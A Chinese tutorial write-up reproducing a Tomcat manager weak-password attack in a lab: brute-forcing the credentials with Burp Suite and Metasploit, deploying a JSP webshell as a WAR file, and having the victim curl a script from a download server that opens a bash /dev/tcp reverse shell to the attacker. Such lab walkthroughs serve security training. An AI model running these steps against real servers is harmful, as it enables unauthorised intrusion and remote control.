漏洞描述

Tomcat有一個管理后臺，其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置，不少管理員為了方便，經(jīng)常采用弱口令。Tomcat 支持在后臺部署 war 文件，可以直接將 webshell 部署到 web 目錄下。其中，欲訪問后臺，需要對應(yīng)用戶有相應(yīng)權(quán)限。
Tomcat7+ 權(quán)限分為：
manager（后臺管理）

manager-gui 擁有html頁面權(quán)限
manager-status 擁有查看status的權(quán)限
manager-script 擁有text接口的權(quán)限，和status權(quán)限
manager-jmx 擁有jmx權(quán)限，和status權(quán)限
host-manager（虛擬主機(jī)管理）

admin-gui 擁有html頁面權(quán)限
admin-script 擁有text接口權(quán)限
二、漏洞影響
Tomcat <= 6.0.0 默認(rèn)用戶名為admin，密碼為空，無暴力破解限制。
Tomcat >= 6.0.0 無默認(rèn)用戶，五次失敗后，賬戶即被鎖定。
但是正常安裝的情況下，tomcat8 中默認(rèn)沒有任何用戶，且 Manager 頁面只允許本地 IP 訪問。只有管理員手工修改了這些屬性的情況下，才可以進(jìn)行攻擊。

復(fù)現(xiàn)

環(huán)境

一臺攻擊機(jī)(kali-2021)192.168.141.190
受害機(jī)(vulhub搭建的)192.168.141.194
一臺用來下載反彈shell腳本的服務(wù)器(內(nèi)網(wǎng),如果有服務(wù)器更好)192.168.141.128(利用時讓受害主機(jī)下載shell文件實(shí)現(xiàn)反彈shell)

攻擊流程

按照前人經(jīng)驗(yàn)可以使用burpsuite進(jìn)行爆破或者使用msf進(jìn)行爆破
首先是根據(jù)burpsuite進(jìn)行爆破:
抓取請求數(shù)據(jù)包可以看到

=其中沒有看到熟悉的賬號密碼,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='將其中的base64字符串解密可以看到結(jié)果格式為"tomcat:tomcat"所以將請求包送至爆破模塊,構(gòu)造格式為x:x的payload

結(jié)果中的200即為成功,但是前面說明了tomcat8或有防爆破機(jī)制,當(dāng)一個用戶名登錄超過五次就會鎖定賬戶,網(wǎng)上有說要用"tomcat暴破圖形化—繞過tomcat 6/7/8的防暴破機(jī)制"這個腳本來繞過但是作者沒有找到免費(fèi)的,就不測試了.
其次使用過msf進(jìn)行爆破

msf中找到上面的模塊配置出options的rhosts和rport就可以進(jìn)行爆破(run)了

可以看到用戶名和密碼在都是tomcat的時候爆破成功,而且可以看到msf應(yīng)該是自帶了繞過防爆破腳本,而且可以通過自定義user和password文件進(jìn)行測試,所以作者更推薦使用msf爆破方式

利用

msf利用

這里強(qiáng)調(diào)一下,在作者復(fù)現(xiàn)網(wǎng)上說的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport進(jìn)行run的時候出現(xiàn)無法拿到shell問題

所以作者使用了exploit/multi/http/tomcat_mgr_upload進(jìn)行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后運(yùn)行拿到shell

反彈shell利用

整體思路:首先在網(wǎng)頁端登錄進(jìn)管理后臺上傳jsp后門文件,然后訪問這個jsp后門即可,雖然上傳之后就可以通過shell軟件控制,但是為了復(fù)習(xí)反彈shell的過程,作者將進(jìn)一步通過上傳的jsp一句話木馬(也可以上傳大馬)進(jìn)行反彈shell.

首先將一句話shelloneword.jsp(一句話木馬文件)通過命令,jar cvf shelloneword.war shelloneword.jsp 執(zhí)行成功后在管理后臺找到如下然后上傳

成功之后可以在這看到結(jié)果

之后通過各種軟件訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

但是作者的方式是通過讓受害主機(jī)訪問服務(wù)器主機(jī)下載shell文件,進(jìn)行反彈shell,所以前面只是中間過程,首先讓受害主機(jī)執(zhí)行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件內(nèi)容為

bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

將ip和端口改為自己的,然后打開nc 監(jiān)聽7777端口,訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

反彈shell成功

參考文章

[1] https://blog.csdn.net/qq_33020901/article/details/98357659
[2] https://blog.csdn.net/weixin_44037296/article/details/116376114
[3] https://blog.csdn.net/qq_43665434/article/details/116903953
[4] https://www.cnblogs.com/henry666/p/14379888.html
[5]https://www.cnblogs.com/qianxinggz/p/13440366.html
[6]https://blog.csdn.net/weixin_42432317/article/details/90208213

到此這篇關(guān)于Tomcat弱口令復(fù)現(xiàn)及利用(反彈shell)的文章就介紹到這了,更多相關(guān)Tomcat弱口令復(fù)現(xiàn)內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評論